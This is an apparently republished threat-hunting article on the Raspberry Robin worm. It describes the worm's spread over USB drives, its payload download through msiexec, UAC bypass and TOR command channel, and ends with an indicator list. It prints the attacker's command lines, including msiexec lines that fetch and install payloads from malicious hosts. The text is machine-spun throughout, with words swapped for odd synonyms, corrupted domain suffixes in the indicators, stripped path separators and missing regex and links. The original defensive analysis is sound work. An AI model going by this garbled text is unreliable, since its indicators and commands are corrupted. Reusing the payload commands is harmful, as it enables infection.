Monday, January 16, 2023
HomeHealth NewsRaspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks

Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks


Throughout our risk searching workouts in latest months, we’ve began to watch a distinguishing sample of msiexec.exe utilization throughout totally different endpoints. As we drilled all the way down to particular person property, we discovered traces of a lately found malware known as Raspberry Robin. The RedCanary Analysis Crew first coined the identify for this malware of their weblog publish, and Sekoia revealed a Flash Report in regards to the exercise underneath the identify of QNAP Worm. Each articles provide nice evaluation of the malware’s conduct. Our findings help and enrich prior analysis on the subject.

Execution Chain

Raspberry Robin is a worm that spreads over an exterior drive. After preliminary an infection, it downloads its payload by msiexec.exe from QNAP cloud accounts, executes its code by rundll32.exe, and establishes a command and management (C2) channel by TOR connections.

Picture 1: Execution chain of Raspberry Robin

Let’s walkthrough the steps of the kill-chain to see how this malware capabilities.

Supply and Exploitation

Raspberry Robin is delivered by contaminated exterior disks. As soon as connected, cmd.exe tries to execute instructions from a file inside that disk. This file is both a .lnk file or a file with a selected naming sample. Recordsdata with this sample exhibit a 2 to five character identify with an often obscure extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. Additionally, the attacker makes use of an extreme quantity of whitespace/non printable characters and altering letter case to keep away from string matching detection methods. Instance command traces embody:

  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /R C:WINDOWSsystem32cmd.exe<Gne.Swy

File pattern for supply may be discovered on this URL:

Subsequent, we observe explorer.exe operating with an obscure command line argument, spawned by a earlier occasion of cmd.exe. This obscure argument appears to take the identify of an contaminated exterior drive or .lnk file that was beforehand executed. A number of the samples had values together with USB, USB DISK, or USB Drive, whereas another samples had extra particular names. On each occasion of explorer.exe we see that the adversary is altering the letter case to keep away from detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK

Set up

After supply and preliminary execution, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. It makes use of -q or /q along with commonplace set up parameter to function quietly. As soon as once more, blended case letters are used to bypass detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you’ll be able to see above, URLs used for payload obtain have a selected sample. Domains use 2 to 4 character names with obscure TLDs together with .xyz, .hk, .information, .pw, .cx, .me, and extra. URL paths have a single listing with a random string 11 characters lengthy, adopted by hostname and the username of the sufferer. On community telemetry, we additionally noticed the Home windows Installer person agent because of the utilization of msiexec.exe. To detect Raspberry Robin by its URL sample, use this regex:


If we glance up the WHOIS info for given domains, we see area registration dates going way back to February 2015. We additionally see a rise on registered domains ranging from September 2021, which aligns with preliminary observations of Raspberry Robin by our friends.

WHOIS Creation Date Rely
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Desk 1: Distribution of area creation dates over time


Related domains have SSL certificates with the topic different identify of, which factors out the underlying QNAP cloud infra. Additionally, their URL scan outcomes return login pages to QTS service of QNAP:

Picture 2: QNAP QTS login web page from related domains

As soon as the payload is downloaded, it’s executed by numerous system binaries. First, rundll32.exe makes use of the ShellExec_RunDLL perform from shell32.dll to leverage system binaries comparable to msiexec.exe, odbcconf.exe, or management.exe. These binaries are used to execute the payload saved in C:ProgramData[3 chars]

  • C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a {regsvr C:ProgramDataTvbzhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a {regsvr C:ProgramDataEuoikdvnbb.xml.}
  • C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.

It’s adopted by the execution of fodhelper.exe, which has the auto elevated bit set to true. It’s usually leveraged by adversaries as a way to bypass Person Account Management and execute extra instructions with escalated privileges [3]. To observe suspicious executions of fodhelper.exe, we propose monitoring its cases with none command line arguments.

Command and Management

Raspberry Robin units up its C2 channel by the extra execution of system binaries with none command line argument, which is sort of uncommon. That possible factors to course of injection given elevated privileges in earlier steps of execution. It makes use of dllhost.exe, rundll32.exe, and regsvr32.exe to arrange a TOR connection.

Detection by World Menace Alerts

In Cisco World Menace Alerts obtainable by Cisco Safe Community Analytics and Cisco Safe Endpoint, we observe this exercise underneath the Raspberry Robin risk object. Picture 3 exhibits a detection pattern of Raspberry Robin:

Picture 3: Raspberry Robin detection pattern in Cisco World Menace Alerts


Raspberry Robin tries to stay undetected by its use of system binaries, blended letter case, TOR-based C2, and abuse of compromised QNAP accounts. Though we now have related intelligence gaps (the way it infects exterior disks, what are its actions on goal) like our friends, we’re constantly observing its actions.

Indicators of Compromise

Kind Stage IOC
Area Payload Supply k6j[.]pw
Area Payload Supply kjaj[.]prime
Area Payload Supply v0[.]cx
Area Payload Supply zk4[.]me
Area Payload Supply zk5[.]co
Area Payload Supply 0dz[.]me
Area Payload Supply 0e[.]si
Area Payload Supply 5qw[.]pw
Area Payload Supply 6w[.]re
Area Payload Supply 6xj[.]xyz
Area Payload Supply aij[.]hk
Area Payload Supply b9[.]pm
Area Payload Supply glnj[.]nl
Area Payload Supply j4r[.]xyz
Area Payload Supply j68[.]information
Area Payload Supply j8[.]si
Area Payload Supply jjl[.]one
Area Payload Supply jzm[.]pw
Area Payload Supply k6c[.]org
Area Payload Supply kj1[.]xyz
Area Payload Supply kr4[.]xyz
Area Payload Supply l9b[.]org
Area Payload Supply lwip[.]re
Area Payload Supply mzjc[.]is
Area Payload Supply nt3[.]xyz
Area Payload Supply qmpo[.]artwork
Area Payload Supply tiua[.]uk
Area Payload Supply vn6[.]co
Area Payload Supply z7s[.]org
Area Payload Supply k5x[.]xyz
Area Payload Supply 6Y[.]rE
Area Payload Supply doem[.]Re
Area Payload Supply bpyo[.]IN
Area Payload Supply l5k[.]xYZ
Area Payload Supply uQW[.]fUTbOL
Area Payload Supply t7[.]Nz
Area Payload Supply 0t[.]yT


  1. Raspberry Robin will get the worm early –
  2. QNAP worm: who advantages from crime? – https://7095517.fs1.hubspotusercontent-na1.internet/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/




Please enter your comment!
Please enter your name here

Most Popular

Recent Comments